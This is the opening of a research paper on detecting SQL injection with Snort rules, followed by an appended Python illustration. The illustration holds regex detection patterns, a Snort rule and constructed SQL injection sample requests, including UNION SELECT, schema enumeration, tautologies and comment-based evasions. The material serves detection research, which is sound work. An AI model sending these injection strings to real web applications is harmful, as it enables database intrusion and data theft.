See discussions, stats, and author profiles for this publication at: https://www.researchgate.net/publication/278677876
All content following this page was uploaded by Quazi Mamun on 18 June 2015.
Detecting SQL Injection Attacks Using SNORT IDS
Abstract—SQL injection attacks pose a serious security threat to the Internet community nowadays and continue to increase by exploiting flaws found in Web applications. In an SQL injection attack, the attackers can take advantage of poorly coded web application software to introduce malicious code into the system and/or retrieve important information. Web applications are under siege from cyber criminals seeking to steal confidential information and disable or damage the services offered by these applications. Therefore, additional steps must be taken to ensure data security and the integrity of the applications. In this paper we propose an innovative solution to filter SQL injection attacks using the SNORT IDS. The proposed detection technique uses the SNORT tool augmented with a number of additional SNORT rules. We evaluate the proposed solution by comparing our method with several existing techniques. Experimental results demonstrate that the proposed method outperforms other similar techniques using the same data set.

Keywords—SQL Injection, SNORT, Intrusion detection, topology.

I. INTRODUCTION

The Internet has rapidly become an integral part of everyday life and our reliance on it is expected to continue to grow. However, its rapid adoption has also left it susceptible to misuse and/or abuse. Along with the growth of the Internet, there has been a dramatic growth in SQL Injection Attacks (SQLIA) [1]. It is a major concern that despite the increasing development of IDS (Intrusion Detection System) and antimalware services and technologies, the volume of SQLIA continues to grow day by day [1]. Therefore, effective and efficient detection techniques are of critical importance to the computer user community. Over the last decade, researchers have adopted a diversity of solutions in order to control SQLIA [1, 2, 3, 13, 14, 15, 6 & 16]. SQLIA is one of the most devastating techniques for stealing data from the backend. It has also been argued that SQLIA is among the top ten security threats in web applications [6]. Using this kind of attack an attacker can get access to the database and steal classified information. The concept of IDS first appeared in James Anderson's technical report [2] in 1980. This first generation IDS could monitor, audit, and log an attacked machine. The main task was to search the audit logs for predefined patterns of suspicious activity [2]. Most IDSs are reliable in detecting suspicious actions by evaluating TCP/IP connections or log files; when the IDS finds a suspicious action, it creates an alert which contains information about the source, target and type of the attack.

SNORT is one of the effective and popular rule-based Network Intrusion Detection System (NIDS) tools to identify intrusion attacks [3]. It is open-source software developed by Martin Roesch [3], and it uses regular expression-based rules for intrusion detection. SNORT is a packet sniffer that monitors network traffic in real time and supports protocols including TCP, UDP, IP and ICMP [3]. It inspects each packet closely to detect an unsafe payload or suspicious anomalies. When suspicious behavior is identified, SNORT immediately generates a real-time alert by logging it to the alert file and/or activating a popup window. SQL Injection and XSS (Cross-site scripting) are the most common and serious web application vulnerabilities threatening the privacy and security of both clients and applications nowadays [6]. SQL injection poses serious threats to the Internet user community due to its recent dynamic attack patterns [10]. Current IDSs are not sufficient to prevent attacks or generate real-time security alerts to the users [8]. It has been investigated how SQL injection attacks are conducted and how hackers use SQL injection to attack web applications [9]. To mitigate this problem, developers have proposed a range of coding guidelines that promote defensive coding practices, such as encoding and validating user input [6]. Researchers have also proposed many vulnerability detection approaches such as static taint analysis [4] and concolic testing [5]; however, these techniques suffer from high FP (false positive) rates.

Conversely, there are many types of SQLIAs and numerous variations of their basic types. However, researchers are often unaware of these variations, and most of their proposed solutions detect or prevent only a subset of the possible SQLIAs. Therefore, it has become a challenge for the research community to develop an active defense technique against SQL Injection and XSS attacks. Keeping this in mind, we have investigated several alternatives for SNORT rules and evaluated their performance. Based on our investigations, we propose a set of rules for the SNORT tool. Our empirical evaluation shows that our technique outperforms similar existing techniques using a similar data set.

The main contributions of this paper are three-fold:

A. Analyse the SNORT IDS and propose five different SNORT rules.
B. Apply the proposed SNORT rules in our experiment for detection evaluation.
C. Apply our method on Damn Vulnerable Web Application (DVWA) to evaluate the performance.

The rest of the paper is organized as follows: section 2 discusses the related work, section 3 outlines the problem statement, section 4 discusses the proposed SNORT rules and section 5 demonstrates the experimental setup and results. Finally, the paper concludes with discussion and conclusion.
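As an added illustration of the regular-expression-based detection the introduction attributes to SNORT (this is example code written for this page, not one of the paper's five rules and not the Snort project's code), the following Python applies pcre-style patterns to constructed request URIs after the percent-decoding and comment stripping that an encoded payload would otherwise use to slip past a naive pattern, and counts true and false positives on a constructed, labelled sample set. The Snort rule in the comment, the pattern names and the sample requests are all assumptions made for the example.

```python
import re
from urllib.parse import unquote

# Illustrative Snort 2 rule shape for the first check below (not one of the paper's five
# rules); the "U" pcre modifier matches Snort's percent-decoded URI buffer:
#   alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SQLi UNION SELECT";
#     pcre:"/union(\s|\/\*.*?\*\/)+(all(\s|\/\*.*?\*\/)+)?select/Ui"; sid:1000001; rev:1;)

COMMENT = re.compile(r"/\*.*?\*/", re.S)

def normalize(uri):
    """Percent-decode twice (double encoding), drop /* */ comments used as whitespace,
    lower-case and collapse whitespace, so one pattern covers the encoded variants."""
    s = COMMENT.sub(" ", unquote(unquote(uri)).lower())
    return re.sub(r"\s+", " ", s)

# Rule name -> pattern applied to the normalised URI (constructed for this example).
PATTERNS = [
    ("union-select", re.compile(r"\bunion\b(\s+all)?\s+select\b")),
    ("schema-enum", re.compile(r"\binformation_schema\.(tables|columns)\b")),
    ("tautology", re.compile(r"\b(or|xor)\b\s*(\d+|'[^']*')\s*(=|like)\s*(\d+|'[^']*')")),
    ("stacked-comment", re.compile(r";\s*(#|--)")),
]

def classify(uri):
    """Return the names of every rule that fires on the request URI."""
    n = normalize(uri)
    return [name for name, pat in PATTERNS if pat.search(n)]

# Constructed sample requests (uri, is_attack): no real sites or payloads from the paper.
SAMPLE_REQUESTS = [
    ("/page.php?id=1", False),
    ("/search.php?q=union+workers", False),                  # benign use of the keyword
    ("/page.php?id=-1%20union%20select%201,2,3%20from%20users", True),
    ("/page.php?id=-1%20union%20all%20select%201,group_concat(table_name)"
     "%20from%20information_schema.tables", True),
    ("/page.php?id=1%20or%20'a'='a'", True),
    ("/page.php?id=1%20/**/union/**/select/**/1,2", True),   # comments as whitespace
    ("/page.php?id=1%0aor%0a1=1%3b%23", True),               # newline as whitespace
]

def evaluate(samples):
    """Count true positives, false positives and misses over labelled samples."""
    counts = {"tp": 0, "fp": 0, "fn": 0}
    for uri, is_attack in samples:
        hit = bool(classify(uri))
        key = "tp" if hit and is_attack else "fp" if hit else "fn" if is_attack else None
        if key:
            counts[key] += 1
    return counts
```

The benign "union+workers" request shows why the pattern anchors on the union...select pair rather than the keyword alone; the two whitespace-evasion samples show why decoding and comment stripping happen before matching.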